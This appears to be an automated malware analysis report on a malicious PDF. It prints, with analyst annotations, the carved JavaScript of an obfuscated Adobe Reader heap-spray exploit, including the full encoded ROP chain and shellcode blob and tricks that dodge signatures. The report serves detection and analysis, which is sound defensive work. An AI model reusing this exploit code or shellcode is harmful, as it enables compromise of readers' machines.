Malicious PDF — malware analysis report

Static analysis result for SHA-256 c5a17cec7f218d0f…

MALICIOUS

PDF

9.0 KB Created: 2009-11-24 11:54:10 Authoring application: Acrobat Distiller 8.0.0 First seen: 2026-05-08
MD5: 91f8606ec4d9f6351f3f21e453a419b6 SHA-1: 094c530a48e0e0c96f194e6afaa2155ee85f7cba SHA-256: c5a17cec7f218d0f2fa57bcb08e3d847a711f3d7cc5e616eca283f835305a8b7
106 Risk Score

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 3

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_000.js pdf-javascript-stream PDF /JS object 13 at offset 0x1B9B 3490 bytes
SHA-256: c45a83c1fa1272414c58c36d0d1ff1717b1b1be21dee4cf2ed60b163cda5654b
Preview script
First 1,000 lines of the extracted script
// Analyst annotation of the carved /JS stream (object 13). The code is left
// byte-identical; comments describe only what the visible statements do.
//
// The first statement aliases the built-in `unescape` under a long random
// identifier, so later `%u`-decoding calls do not contain the literal word
// "unescape". Identifier length/entropy like this is itself a triage signal.
var LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW = unescape;
// Opaque `%uXXXX`-encoded blob decoded via the alias above. The heuristic
// PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY in this report classifies the decoded
// content as the ROP chain / payload stage; the individual words are not
// interpreted here (the string literal is wrapped across two lines by the
// report's extraction, not by the sample).
var GwxMOaGTDIbubiLZOOi = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%u4141%u4141%u63a5%u4a80%u0000%u4a8a%u2196%u4a80%u1f90%u4a80%u903c%u4a84%ub692%u4a80%u1064%u4a80%u22c8%u4a85%u0000%u1000%u0000%u0000%u0000%u0000%u0002%u0000%u0102%u0000%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9038%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0000%u0000%u0040%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0008%u0000%ua8a6%u4a80%u1f90%u4a80%u9030%u4a84%ub692%u4a80%u1064%u4a80%uffff%uffff%u0022%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u63a5%u4a80%u0004%u4a8a%u2196%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0030%u0000%ua8a6%u4a80%u1f90%u4a80%u0004%u4a8a%ua7d8%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u0020%u0000%ua8a6%u4a80%u63a5%u4a80%u1064%u4a80%uaedc%u4a80%u1f90%u4a80%u0034%u0000%ud585%u4a80%u63a5%u4a80%u1064%u4a80%u2db2%u4a84%u2ab1%u4a80%u000a%u0000%ua8a6%u4a80%u1f90%u4a80%u9170%u4a84%ub692%u4a80%uffff%uffff%uffff%uffff%uffff%uffff%u1000%u0000%uccdb%ua7bd%uf9f1%ud905%u2474%u5af4%uc933%u5eb1%u6a31%u8317%u04c2%ucd03%u1be2%ufaf0%u8615%ucfb1%u50dc%u13ff%u1cde%u61cb%ufe79%u9ece%u177c%u9fc5%u1880%u136a%u7ee6%u6812%ub9e5%uf78c%u238f%udedc%u4125%u6508%u7471%uf413%u3968%u1cb1%uab29%u6758%u56d3%u75c8%udef3%u1b97%uf7e9%u7125%u3779%u4dfb%u6190%u2f9e%u0687%u386c%ub267%uabad%u83f9%u2914%u9ea4%u3645%u6128%u0fb3%u35da%u502e%u2f66%u2614%ucae1%u1cf1%u1441%uf113%u3570%u6b91%u912e%u10e2%u7955%ubf01%u20f0%udc37%ubb16%u7d2d%u5180%u721b%u9533%ubdea%u8fd5%u2794%u3bb9%u986d%u8a23%ue517%u53be%u712b%u227e%u186f%u5ce6%u4575%u9093%u6055%u3704%uf186%ue753%u324f%u8279%uaed6%u9f3b%u0490%u91a5%uc696%ub4b7%u0e9c%u3470%u3340%u58e5%u379c%ufa83%u9ef5%u357d%uefc3%ua0b7%u8a1a%u6855%u9e6a%ubc3c%ud705%u8ea7%u4dbb%u3a7e%uc858%u246d%u21a8%u6fa2%ufe4e%ub0fe%u7bbd%u9b76%u219b%u6409%ub37d%u448f%ud67e%u9299%ud289%u98c2%uc98b%u880f%u949e%ub12e%u6cb2%ua02e%u8ca0%
ue85b%u87cb%ue958%ua1c1%uee4a%ud4c2%u1f43%u3a05%u1cba%u5b10%u3ce1%ub615%u4ed7%ub43d%u4d10%u915b%u5617%ucca1%u5c28%u16b1%u4323%u7f9e%u6f58%u8bea%u8757%ubf8c%ubd53%uc972%uc98a%uc378%ucbab%udd4e%uc493%udda4%ubcf4%u692f%ucf71%ube95%u4a56%ua586%uf1c6%u4478%u967b%ueaaa%u49e0%uddd2%uf081%u4460%u9e36%uf6a6%u10ae%u4137" );
// The filler value is assembled from single-character pieces so that the
// literal "%u0c0c" never appears in the source; a signature that only matches
// the assembled token will not fire on this stream. 0x0c0c is the classic
// heap-spray filler value the report's heuristic describes.
var aV = LawbhpJUIQWCllhkYAQGgNvKwUGkDkavTFTiXcOXZoqUeUJiSjYEgjWnnAgxVatbJjwSIDHHYXaaJRkRsfZJGW( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
// Repeated self-concatenation until the string is just under 64 KiB
// (65536 - 28 UTF-16 units). Doubling loops on a short seed string are a
// strong static indicator for spray construction.
while (aV.length + 20 + 8 < 65536) aV+=aV;
// Spray unit = [filler prefix of (0x0c0c - 0x24)/2 units] + [payload blob] +
// [filler]. Note the assignment without `var`: an implicit global, common in
// machine-generated exploit JS.
eDoIoFvtryuHUMXQgkvdE = aV.substring(0, (0x0c0c-0x24)/2);
eDoIoFvtryuHUMXQgkvdE += GwxMOaGTDIbubiLZOOi;
eDoIoFvtryuHUMXQgkvdE += aV;
// Take the first 32 KiB of the unit, double it until it reaches 0x80000 units,
// then trim to 0x80000 - (0x1020 - 8)/2. The exact sizes are presumably chosen
// to match the target allocator's block granularity — not verifiable from the
// script alone.
g = eDoIoFvtryuHUMXQgkvdE.substring(0, 65536/2);
while(g.length < 0x80000) g += g;
mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq = g.substring(0, 0x80000 - (0x1020-0x08) / 2);
// Final spray: 0x1f0 (496) array slots, each holding a copy of the large block
// with a trailing "s" appended. The append presumably forces a fresh string
// allocation per slot instead of a shared reference — TODO confirm against the
// engine version the report targets. For detection, key on the combination:
// aliased unescape, fragmented "%u0c0c", string-doubling loops, and a large
// array fill with near-identical multi-hundred-KiB strings.
var kFHCU = new Array();
for (NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY=0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY<0x1f0;NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY++) kFHCU[NWsHhVVQHWjfEvjJmsikNrIJKSNetFOOxQZYAQfMYqaVOImgiJKzAFeMSuJFqWEAbGTjyBijdprEAeXqFjZECdjQgFKCeMhEewY]=mDbkYTBYxwNHMBkdMaRLPvSicTROvgvbIZdYRIMJDtqNJNFIgCpkPdUckHHSwhuzwHUZgtNqq+"s";